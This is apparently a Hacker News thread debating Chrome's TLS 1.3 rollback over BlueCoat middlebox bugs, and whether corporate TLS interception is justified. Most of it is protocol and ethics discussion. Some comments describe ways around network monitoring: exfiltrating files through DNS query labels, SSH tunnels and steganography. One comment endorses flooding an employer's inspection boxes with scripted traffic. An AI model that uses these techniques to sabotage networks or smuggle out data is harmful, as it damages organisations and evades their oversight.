In this case, it doesn't sound like they're reverting it because of overall breakage, but rather because it breaks the tool that would otherwise be used to control TLS 1.3 trials and other configuration. Firefox had a similar issue, where they temporarily used more conservative settings for their updater than for the browser itself, to ensure that people could always obtain updates that might improve the situation.
Good grief! From David Benjamin's final comment:
Note these issues are always bugs in the middlebox products. TLS version negotiation is backwards compatible, so a correctly-implemented TLS-terminating proxy should not require changes to work in a TLS-1.3-capable ecosystem. It can simply speak TLS 1.2 at both client <-> proxy and proxy <-> server TLS connections. That these products broke is an indication of defects in their TLS implementations.
It's understandable that I've never heard of BlueCoat: clearly this product's success is based more on selling to executives than on quality, and it has been some time since I worked in an organization that had executives to sell to.
Then don't filter content.
What these "enterprise environments" want is to leech off the Internet's knowledge while keeping a firm chokehold on the privacy of their own employees Sadly, it looks like Google is caving in to their pressure.
All browser vendors provide the necessary bits for properly implemented HTTPS MITM, and have done so for ages (which are fairly simple, basically "allow local trusted certificate roots and ignore key pinning for them").
If you're using your company's network, then they have every right to monitor all of the activity on it. They're trying to protect trade secrets, future plans, customer data, employee records, etc. from attackers who would use that information to do harm to the company, its customers, and its employees. If you don't want your employer to know what you're doing, then don't use the company computer or company network to do it. And while you may think that you're too tech savvy to fall prey to malware 1) not everyone at your company is, and 2) no amount of savvy will protect you from all malware, especially ones that gain a foothold through an unpatched exploit. And there's also that whole other can of worms: malicious employees.
-our commitment to our customers and regulatory compliance requires we know where customer data is at all times. It would be lovely if all employees could be trusted with data at all times, but the reality is some employees will steal information, as google found out with Levandowski. That's google's own information though; they don't have a regulatory requirement to report the breach, whereas the data I protect requires full disclosure legally.
-malware is increasingly using https to communicate with C&C. Many malware families now install a trusted root cert so they can exfiltrate data on less monitored 443 rather than 80. When (not if) devices get compromised we need to know what the attacker got.
I would love to not need to do this because it's a privacy mess and breaks applications all the time, but there simply are not better tools to serve as the last line of defence against data loss.
iOS has mostly solved this problem through a combination of not running unsigned code and APIs where MDM can draw a corporate data barrier inside the phone, but while desktop OSs remain there will need to be some form of this.
Against that, making life hard for Chrome engineers’ aggressive upgrade campaign is pretty hard sell. “Buy a better box” perhaps but I don't see a viable argument for “don't monitor”.
Because one size really does fit all, and all environments have the same needs?
[0]https://www.fcc.gov/consumers/guides/childrens-internet-prot...
[1]https://www.fcc.gov/general/universal-service-program-school...
At least from my view, it's not so much that I don't want my company to know what I'm doing, as that I don't trust their software to securely MITM all of my traffic. This thread doesn't fill me with confidence about the competency of these corporate MITM proxies. And the recent Cloudflare news doesn't help either -- they're effectively the world's largest MITM proxy, and even they couldn't avoid leaking a huge amount of "secure" traffic.
There are surely sectors where it's necessary for a company to MITM all traffic, but I think most companies will do better security-wise by not messing with TLS. It's just too hard to get right.
From a privacy perspective, it doesn't really matter if the monitoring happens centralized or not.
In the cases where I've seen strict filtering laptops were forced through VPN connections to HQ, where the gateway then decides what parts of internal and external networks they are allowed to access.
It sounds like a perfectly reasonable behaviour if the goal is to "fail closed", to provide more security in a fashion similar to a whitelist.
If it sees that it's TLS, it should attempt a protocol downgrade.
I don't remember the exact details but I recall reading that TLS has a mechanism to prevent version downgrades, precisely to defend against such "attacks", so the connection would not succeed in that case either.
A few days ago there were other issues with this causing Chromium to stop working on *.google.com so it's not just about middle-boxes.
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=855434
https://bugs.chromium.org/p/chromium/issues/detail?id=693943
Most of the solutions I have seen for devices outside the corporate perimeter are some combination of enforced vpn and authenticated proxy that is internet accessible.
The way it is supposed to work is as following: there is a protocol negotiation when the connection is established (which is obviously unencrypted), which contains TLS version supported. If MITM proxy does not understand the version, it can just change these bytes to force hosts to negotiate at a lower version.
So the only reason BlueCoat fails is because the authors failed to implement force version downgrade.
(Also it's possible can do server address based blocking without MITM)
This reminds me of firewalls that weaken security by filtering unrecognized HTTP headers: https://news.ycombinator.com/item?id=12655180
Now, because engineers are so bad at saying 'no' to the people who want SSL MITM, it's apparently become a regulatory requirement. SSL MITM might let you passively surveil your employees' Facebook Messenger conversations, but it still doesn't protect you against a malicious employee who is tech-savvy (or malware written by people who have SSL MITM proxies in mind.) They could just put the information they want to smuggle out of the network into an encrypted .zip. They could even do something creative like using steganography to hide it in family photos that they upload to Facebook. The only real solution to this is to lock down the devices that people access the network on, not the network itself.
> At this point it's worth recalling the Law of the Internet: blame attaches to the last thing that changed.
> There's a lesson in all this: have one joint and keep it well oiled.
> When we try to add a fourth (TLS 1.3) in the next year, we'll have to add back the workaround, no doubt. In summary, this extensibility mechanism hasn't worked well because it's rarely used and that lets bugs thrive.
It isn't a question of whether they're allowed to do it, it's a question of whether they should do it.
It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
And it's similarly ineffective against malware because TLS is not the only form of encryption. What difference does it make if someone uploads a file using opaque TLS vs. uploading an opaque encrypted file using MITM'd TLS? Banning encrypted files, even if you could actually detect them, doesn't work because they're often required for regulatory compliance.
It isn't worth the security cost. The situation in the article is bad enough, but consider what happens if the MITM appliance itself gets compromised when it has a root private key trusted by all your devices and modify access to all the traffic.
If merely advertising 1.3 while still advertising older versions causes blue coat to break, it has a bug in TLS version negotiation.
There is no downgrade or whitelist or failing closed. Each end says what they support and BlueCoat blows up the connection if it sees that the other end supports a newer version. It should say "oh we both support 1.2 let's use that" And apparently it's done this before so there's even less an excuse for it.
That wouldn't be a certain Sergey Aleynikov and GS would it? (https://en.wikipedia.org/wiki/Sergey_Aleynikov)
If you're using your company's network, then they have every right to monitor all of the activity on it.
This is tantamount to steaming open and resealing the envelopes of all physical mail. Have some god damn ethics, I'd sooner quit than snoop traffic in this manner.How so?
1. Connect to Corp Wifi
2. git clone companyapp.git
3. Connect to Employee Personal Wifi
4. Email tgz'ed companyapp
?
[1] https://en.wikipedia.org/wiki/Blue_Coat_Systems#Use_by_repre...
They also have 46,000 PCs. So yeah - pretty decent size...
We opted to disable usb mass storage since cavity searches seemed a little much
I would never trust a company device, or company network, with anything I consider sensitive. Use your own device and keep it on cellular.
Also though I don't like it, employers in the US do have the right to open mail addressed to you personally if delivered to the office.
There's a good argument that it's unethical too. There are many ways where your company has to trust you instead of pervasively monitoring your doings and communications, and this should fall in the same area.
This is missing the point. Someone could plug a SATA drive directly into the motherboard, or otherwise compromise their work computer to disable the restrictions, or take pictures of documents with a camera, or bring their own computer on-site, or bring a line-of-sight wireless network device on-site, or send the data over the internet as an encrypted file or via ssh or using steganograhy and so on.
The point is that preventing data exfiltration is not a trivial task, and if you're at all serious about it then the network containing the secrets is not connected to the internet. And if it's less serious than that then it can't justify a high-risk TLS MITM device.
Exactly this is what I don't get. Since these abominations are becoming ubiquitous, surely malware writers are starting to work on workarounds? And in this case, it's as easy as setting up an SSH tunnel and running your malware traffic through that, which is a few days of work at best for a massive ROI?
This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
>They may or may not mention that if they do it wrong it will degrade the security of everything on the network.
Right, that's why you don't do it wrong. This same argument applies for any monitoring technology, like cameras. An insecure camera system actually helps a would-be intruder by giving them valuable information. So if you install cameras, you'd better do it right.
As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all? There is no security panacea, just a wide range of imperfect measures to be deployed based on your threat model and resources. And luckily, most bad guys are pretty incompetent. But to address some examples you give, and show how not all is lost:
- A large encrypted zip file is sent out of the network. Depending on what your concerns are, that could be a red flag and warrant further analysis of that machine's/user's activity.
- Software trying to circumvent your firewall/IDS is definitely a red flag. You might even block such detected attempts by default, and just maintain a whitelist for traffic that should be allowed regardless (e.g. for approved apps that use pinned certificates for updates).
I'd be interested to see the cost of compliance versus the subsidy. The federal government puts an awful lot of strings on financing for schools given the relatively low percentage of overall funding they pay.
I'd like to see some state somewhere turn down the money and see what they can do with the extra flexibility.
Quite a pain to work in such environments.
In the case of a security appliance -- such as this -- it should, in my opinion, "fail closed".
> This isn't true. The TLS protocol is not a philosophy; [...]
Well, the TLS specification [1] says as the first sentence of the introduction:
"The primary goal of the TLS protocol is to provide privacy and data integrity between two communicating applications."
I think, if something is "the primary design objective of TLS", it can be said that TLS is designed to do it.
https://jhalderm.com/pub/papers/interception-ndss17.pdf
How do you fix this when you're naught but a humble employee? Well, a friend of mine worked at a fairly large tech company where a salesguy for these boxes had convinced the CTO they had to have them. Every tech-person "on the floor" hated the idea, so before the boxes were installed they conspired on their free time to write some scripts that ran lots of legitimate HTTPS traffic, effectively DDOSing the boxes and bringing the company's internet to a crawl for the day, like Google would take ten seconds to open. Then obviously everyone (including the non-tech people) started calling the IT helpdesk complaining that the internet was broken. MITM box salesguy then had to come up with a revised solution, costing 20x more than his first offer, and that was the end of that.
If you already are suffering under MITM boxes, a similar strategy with a slow ramp-up in traffic might work.
Yes, if one is determined enough, they will find a way to steal data.
> It isn't worth the security cost.
That's up for the company to decide... and apparently they have decided that it is worth the cost, regardless of what zrm, random person on the Internet, thinks.
The RFC (which if you're implementing TLS, you should have open at all times) explicitly calls out exactly this behavior:
> Note: some server implementations are known to implement version negotiation incorrectly. For example, there are buggy TLS 1.0 servers that simply close the connection when the client offers a version newer than TLS 1.0.
The quality of this vendor's implementation is extremely suspect.
I dunno. I know plenty of people who might want to work on an Excel spreadsheet at home over the weekend and so might e-mail it to their personal e-mail account. They would almost certainly reconsider, however, if it required copying that spreadsheet to a flash drive that they then had to hide in their ass, though.
In that case, it sounds like the device is effective after all.
Even protocol state (equivalents of TCP FIN/SYN/etc) is encrypted, to ensure that middleboxes don't get ideas about what the protocol is 'supposed' to do - ideas which make it hard to change the protocol in the future.
This isn't "failing closed", and this isn't a whitelist. TLS allows you to whitelist to certain versions of the protocol during the initial negotiation at the start of the protocol; that is the opportunity for either end to state what version of the protocol they'd like. It is not permissible in the protocol to close the connection as Blue Coat is doing.
This isn't a downgrade attack, either: both server and client are free to choose their protocol version at the beginning. The client & server will later verify that the actual protocol in use is the one they intended; this is what prevents downgrades.
That's the simplest explanation, though, so that's probably what happened. Oh well.
Suppose you're a college dorm network. Then you can't justify TLS MITM because the risk of your MITM device actively creating a security hole that leads to all the students' bank passwords being stolen is greater than any benefit from centrally monitoring the traffic in that environment.
Suppose you're a highly classified government research lab. Then you can't justify TLS MITM because the bad guys are skilled foreign government agents and you need to isolate the network from the internet.
And there is no happy medium because the risk and cost of having all your TLS-secured data compromised scales with the target value. The higher the target value the higher the risk created by the MITM proxy, all the way up to the point that you can justify isolating the network from the internet.
In corporate environments, the last thing that changes is the thing that gets blamed. BlueCoat was not upgraded, Chrome was, and now things are broken? Not their fault.
Also, wasn't there some security issues relating to the possibility to downgrade the encryption of a connection?
What you do while on work should not be personal and thus cannot be snooped upon.
If you need to send a personal paper letter, you would go to the post office, not send it using the company's stamps, right?
The obvious place is the TLS version number in the handshake. It can say "I support up to TLS 1.3" and the other side can say "I support up to TLS 1.2" and the obvious choice is 1.2. But again, some webservers and middleboxes, as soon as they see 1.3 there, they freak out, block the connection completely.
Another idea for where to put it is in the candidate ciphers list - a "oh and I support TLS 1.3" pseudo-"cipher". The other side is supposed to just not use it if it's not recognized. Bug again, some stuff out there just freaks out.
Why do they freak out? Sometimes it's because someone thought that any unrecognized bit could be a hacking attempt. Sometimes it's because the software starts as a pile of bugs and is just debugged to the point that it mostly works today (and at that time "1.3" was never seen at exactly that spot).
So the goal of "GREASE" is to put random not-enumerated values in places like the ciphers list. Once a server or middlebox is compatible with GREASE, it'll be compatible with any future optional upgrade signal being present in those parts of the TLS handshake.
(I'm not sure where GREASE has been implemented so far, and I'm not sure if TLS 1.3 is 100% finalized yet.)
> Have some god damn ethics
Personal attacks are not allowed on HN. We ban accounts that do this, so please don't do it.
We detached this subthread from https://news.ycombinator.com/item?id=13750650 and marked it off-topic.
It then simply inspects a connection it doesn't understand and 'fails closed' by preventing that connection.
Like the sibling comment said, this goes against the wording of the TLS specification, but I also think this is looking at the issue from the wrong perspective: from the perspective of the network admin rather than the user. The user does not trust the MITM proxy's fake root. Let's say you set up a corporate network and rather than just whitelisting the external IPs you trust, you give your users the freedom to browse the internet but you pipe everything through a BlueCoat proxy. Your users will take advantage of this freedom to do things like, say, checking their bank balance. When the user connects to the banking website, they will initialize a TLS session, the purpose of which is to keep their communication with their bank confidential. The user will assume their communication is confidential because of the green padlock in their address bar and the bank will assume their communication is confidential because it is happening over TLS. TLS MITM violates these assumptions. If the bank knew that a third party could see the plaintext of the communication, they probably would not allow the connection. If I ran a high-security website, I'd probably look for clues like the X-BlueCoat-Via HTTP header and just drop the connection if I found any.
> As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all?
In some cases, yeah. There are a lot of security measures out there that are just implemented to tick some boxes and don't provide much practical value. If they don't provide much value, but they actively interfere with real security measures (for example, by delaying the rollout of TLS 1.3) or they're just another point of failure and additional attack surface (bad proxies can leak confidential data, cf. Cloudflare,) they should be removed. I'll admit most bad guys are incompetent, but it's dangerous to assume they all are, because that gives the competent ones a lot of power, and someone who is competent enough to know that a network uses a TLS MITM proxy will just add another layer of encryption. (Or, like some other comments are suggesting, they'll just test your physical security instead and try to take the data out on a flash drive.)
Which holds trusted secret keys and which, in its normal unremarkable operation, intercepts, parses, reconstructs, decrypts, re-encrypts, forwards, and optionally logs both confidential and attacker-controlled traffic? And is also known to be used for nationwide bulk internet censorship by regimes often called 'oppressive'?
Why, doesn't it just.
Please consider, very carefully, the ethics and equities issues one might face with any interesting findings here.
This isn't just a fireable offense. Especially given the tendency for computer-related criminal laws to be overly vague, it's entirely possible you could be charged with a crime if you are intentionally trying to DoS your employer's network.
AIUI CIPA doesn't require MITM but most schools interpret it that way.
Or plain HTTP POSTs with encrypted content. If it reject stuff that looks encrypted, plain HTTP POSTs encoding the binary files by taking a suitably sized file of words and encode it as nonsensical rants to a suitable user-created sub-reddit.
Or e-mails made using the same mechanism.
If you want low latency two way communication doing this can be a bit hard, but you basically have no way of stopping even a generic way of passing data this way unless you only whitelist a tiny set of trusted sites and reject all other network traffic (such as DNS lookups). And keep in mind you can't just lock down client traffic out of the network - you also would need to lock down your servers and filter things like DNS - the above mentioned DNS approach will work even through intermediary recursive resolvers (malware infected desktop => trusted corporate recursive resolver => internet), unless they filter out requests for domains they don't trust.
But basically, if you allow data out, it's almost trivial to find ways to pass data out unless the channel is extremely locked down.
For those who don't know, there are even full IP proxies that uses DNS [1], but you can hack up a primitive one using shell script by basically setting up a nameserver for a domain, turning on all query logging and using a shell script that splits your file up, encodes it into valid DNS labels and requests [some encoded segment].[yourdomain]. Now your file will be sitting in pieces in your DNS query log and all you need is a simple script to re-assemble it.
Best of all is that it works even if it passes through intermediary DNS servers, such as a corporate proxy, unless it's heavily filtered (e.g. whitelisting domains) or too rate limited to be useful.
TBH, for most techies I don't think opposition to MITM boxes comes down to "I don't want them to catch me looking at cat photos" but more along the lines of "this will actually reduce security as much as it improves it, and the companies providing these products are also aiding repressive regimes and human rights violations across the globe". Personally, I would find it unethical for the company I work for to buy these products.
> "Enterprise class Blue Coat’s SSL Visibility Appliance is comprehensive, extensible solution that assures high-security encryption. While other vendors only support a handful of cipher-standards, the SSL Visibility Appliance provides timely and complete standards support, with over 70 cipher suites and key exchanges offered, and growing. Furthermore, unlike competitive offerings, this solution does not “downgrade” cryptography levels and weaken your organization’s security posture, putting it at greater risk. As the SSL/TLS standards evolve, so will the management and enforcement capabilities of the SSL Visibility Appliance."
My intention was a (perhaps poorly worded) call on those in the industry to have a sense of ethics, and not meant to single any person in particular.
The TLS community knew that there would be problems with the deployment of TLS 1.3 with version intolerance, because there always have been. That's why the version negotiation was changed and a mechanism called GREASE was invented to avoid just such problems. But it seems BlueCoat has shown us that there's no way to anticipate all the breakage introduced by stupid vendors.
The takeaway message is this: Avoid Bluecoat products at all costs. These companies are harming the Internet and its progress.
You cant even freeze chrome extensions.
If you break my ability to monitor the use of my devices, your product is dropped from my network. You'll also find that it is dropped from the entire education sector. That is why Chrome has backed off this change.
I don't think so. Since when is it legal for anyone to circumvent encryption systems?
Is it legal for your ISP to do this on "their network"? Actually, I bet you think that's OK too.
Incidentally, "Blue Coat ProxySG 6642" was the only middlebox to get an "A" from the study referenced above. Apparently they didn't test for 1.3...
There are hundreds of thousands of organizations that need inspection and caching and proxying of internal www traffic. That all protocols should disallow or frustrate this disregards real needs of users and organizations.
Further still, if protocols can't be designed to be implemented easily or to allow for implementation bugs or lack of features, it's a crap protocol or application. Middleware will always be necessary, and encryption really shouldn't change the requirements of how middleware needs to work with a protocol.
In truth though if you start considering your employees like the enemy it's just a never ending upwards battle, especially if your employees are comp-sci folks. You could tunnel SSH over HTTP or even DNS if you cared enough.
I understand that proper network hosts will negotiate TLS versions rather than "freaking out".
(Note: I would also never trust a company device or company network, and I keep my personal devices completely separate from the company network for this reason. But I consider this a workaround for a deplorable situation, rather than just the way things are.)
Then in firefox (or other), the socks proxy is on localhost port 4242.
Then leave the company in protest or convince it not to buy them. DDoSing the company's network is somehow not unethical, I guess?
My point is that actually helping this particular vendor, for example, may not be everyone's cup of tea.
It's pretty entertaining to read this stack overflow questions about using ssl from 7 years ago: http://stackoverflow.com/questions/2177159/should-all-sites-...
Why isn't there an effort to detect MITM proxies and post equally scary warnings? Surely users have a right to know.
MITM is worse than self signed certs and if 'exceptions' can be found for MITM like corporate security, management etc then the same exceptions should be found for self signed certs for individuals rather than creating dependencies on CA 'authorities'. This just another instance of furthering corporate interests while sacrificing individuals.
You can create a self signed CA and add it to trusted roots to avoid warnings.
Similarly, good security people know that port filtering is a losing game unless you are willing to restrict everything to a known-safe whitelist – the malware authors do work full-time on tunneling techniques, after all – and may be focusing their efforts on endpoint protection or better isolation between users/groups.
Why not promote content encryption or explore other ideas that do not rely on central authorities, and we can see there are always workaround for corporates but individuals are thrown under the bus.
I think its reasonable for a company to want to filter everything that comes through their pipe, if anything, it's a bit of a liability not to do it, but at the same time, non-technical people should understand that their connection is being unencrypted and re-encrypted, and be educated on the consequences.
There are a few local coffee shops which terminate SSL, and when people see me closing my browser and laptop, or starting to tether through my phone because of the cert error they tell me "oh, you just need to accept all those certs!".
I need my personal email to do my work. It needs to stay secure from even my own employer. Period.
IOW, it's completely fair to argue that users might not have a universal right to encryption, but it's just as legitimate to argue that browser vendors have no obligation to enable the trivial circumvention of encryption. If the software doesn't work for your needs, then stop using the software.
The middleware should require effort to install, and it should be obvious when it is active. Otherwise, companies which have no business MITM'ing the traffic -- such as ISPs and free wifi providers -- will start to do it just because it's so simple.
For example, Google may require MDM app on the Android devices which is used to access corporate data. This app ensures that the device has the right policy (screen lock, encryption) and I think it may also check for malware apps. This is how it should be -- if you need corporate control over devices, install special application on it, it will be more efficient and it will do more.
While there was previously this "TLS fallback" implemented in Chrome to work around buggy endpoints, this was primarily due to buggy endpoints* which was a much larger issue and difficult to fix, while these middlebox issues affect a much smaller portion of users and we're hopeful that the middlebox vendors that have issues can fix their software in a more timely manner.
* TLS 1.3 moves the version negotiation into an extension, which means that old buggy servers will only ever know about TLS 1.2 and below for negotiation purposes and won't break in a new matter with TLS 1.3.
Nobody made that argument. But browser makers have an obligation to keep the world wide web usable. If it's not usable, say goodbye to dot com companies selling services to businesses, which aside from advertising revenue (and the hopes and dreams of venture capitalists) is the only way they survive.
The only reasonable alternative if you start locking out legitimate business use cases of traffic inspection is to abandon the web and start making proprietary native applications and protocols like back in the old days. This is bad for users and bad for business.
It's not like it's even hard to support these use cases while maintaining user security! Browsers just totally suck at interfacing with a dynamic user role. Better UX and a more flexible protocol would solve this, but nobody wants to make browsers easier to use (more the opposite)
Collective action (strikes, "work slowly protests" etc.) as a protest against company policy has a long precedent of a) being protected by law and b) being much more effective than a single employee quitting, while simultaneously reducing the downside for employees (in L_\infty norm).
Edit: the old Keynes quote comes to mind: "if you owe the bank $100 you have a problem, but if you owe the bank $100 million the bank has a problem" -- if 1 of the company's devs commits a "fireable offense", he/she has a problem, but if 100 of them do, the company has a problem.
In any case you are left with no SSH, or somebody watching your ssh and have control over your ability to tunnel.
The best you can do with these boxes is make a sub tunnel over one of the protocols that they do allow through, you just can't rely on the primary encryption provided by the protocol that the middle box is executing MITM on. If somebody actually looks at the traffic they will see that you are not transferring plain text at the middle box, so that might raise some eyebrows.
On Android every time a user-installed certificate authority is used a warning is shown. Furthermore, the user is forced to set a lock screen the moment you install a certificate.
If Google can push this (frankly user unfriendly) UI through, why not change "Secure" into "Monitored" in Google Chrome? The green padlock is a lie and the truth is exposed only after inspecting the certificate using the web developer tools.
Everything you listed is information that the company already has access to. Why isn't it sufficient for there to be access controls by policy, the same way the company protects other sensitive information from unauthorized acres within the company?
For instance if your policies are too restrictive people will use their smartphones more and more to access the internet. Then some will start doing work stuff on their smartphones and you lose all control. What do you do then? Forbid smartphones within the company? Fire everybody you catch using one? It's just an arms race at this point.
Sane security measures and some pedagogy go a long way. Easier said than done though, it's a tough compromise to make.
This FindLaw article http://employment.findlaw.com/workplace-privacy/privacy-in-t... agrees that employers have a right to monitor communications from their devices on their networks, especially when this policy has been clearly laid out and agreed to by employees. Expectation of privacy is a major deciding factor in US law.
I'm not sure of the legality of an ISP doing this. I would hope it's illegal, but ISPs are weirdly regulated compared to, say, phone companies.
As a regular user, I can't just use a captive portal to get free wifi, because any site I go to has HTTPS, so they all break and I can't accept the god damn HTTP accept page unless I can conjure up a valid domain that has no HTTPS like I'm Svengali. Now all the OSes have special checks to see if there's a captive portal because the browsers couldn't be troubled to build a function for it, even though it would improve their security and usability at the same time.
Captive portals are not the enemy. Shitty UX and a bad attitude toward the needs of real users is. Locking browsers/protocols down more is just doubling down on this mentality.
Then continue to use the encryption that exists today. After all, your concern is for future standards that make encryption stronger.
> And fork a browser? Are you nuts?
A lone user forking a browser would be nuts. A company that's already willing to pay through the nose for MITM proxies can afford to fund a minor browser fork. Indeed, if this use case is as important as you suspect, then you ought to start a company that sells customized browsers for exactly this purpose. Think about what site you're on; where's your entrepreneurial spirit? :)
> But browser makers have an obligation to keep the world wide web usable.
Usable for whom? Between users (who need strong encryption), websites (who need strong encryption), and corporate intranets (who need to snoop), whose needs ought to be prioritized?
> abandon the web and start making proprietary native applications
The web emerged from a world where all applications were native and proprietary, I don't think any browser vendor is losing sleep over this possibility.
> Browsers just totally suck at interfacing with a dynamic user role.
Again, sounds like there's demand for a new browser then. :)
> nobody wants to make browsers easier to use (more the opposite)
Why is that?
I would argue against such an approach if there are alternatives but if the organization's leaders were set on it I would engage with the process and make sure that it did not evolve into more unethical practices such as logging all traffic contents or the above banking example.
Every non-Microsoft browser vendor used to cry themselves to sleep at night from days fighting against vendor lock-ins and corruption of standards. They certainly care if it all goes south.
I suppose people don't want easier browsers because they imagine they are easy enough and can't imagine something better. At least I hope that's the reason, and not that they fear change, or are indifferent to the needs of people other than themselves and prefer to design for that alone.
There's no way in hell I'm crazy enough to make a browser, though. I'd rather run for elected office, or eat an entire Volkswagen Golf.
Were you writing a forum post? It was lost because it got submitted to captive portal. Were you in dynamic app? It crashed because it got HTML instead of JSON. Does you page reload ads in the i-frames? Your page position and page itself is now lost, and you are in captive portal page. Did you have a native app which did HTTP requests and cached them? Congrats, you have invalid data in your cache now.
And I have seen captive portals which were broken. How about you get redirected to login page every time you go to your favorite website, because the redirect page got cached somehow?
Good riddance. Yes, the browsers should include better captive portal support like android does, possibly triggered by the SSL certificate mismatch errors, but even the current situation when I have to type "aaa.com" by hand all the time is great.
While unfortunately for TLS client certificates are not a solution against MITM due to their awful user experience and privacy concerns, for SSH public key authentication has a good user experience, and is very common.
The scary warnings for self-signed certificates are in fact a protection against MITM. It's because of them that MITM proxies are forced to install a CA certificate. The main difference is that installing a CA certificate requires explicit action in the browser (and on some newer systems displays scary warnings), while if a MITM proxy could simply present a fake self-signed certificate, it could easily intercept anyone. Therefore, self-signed certificates are strictly worse.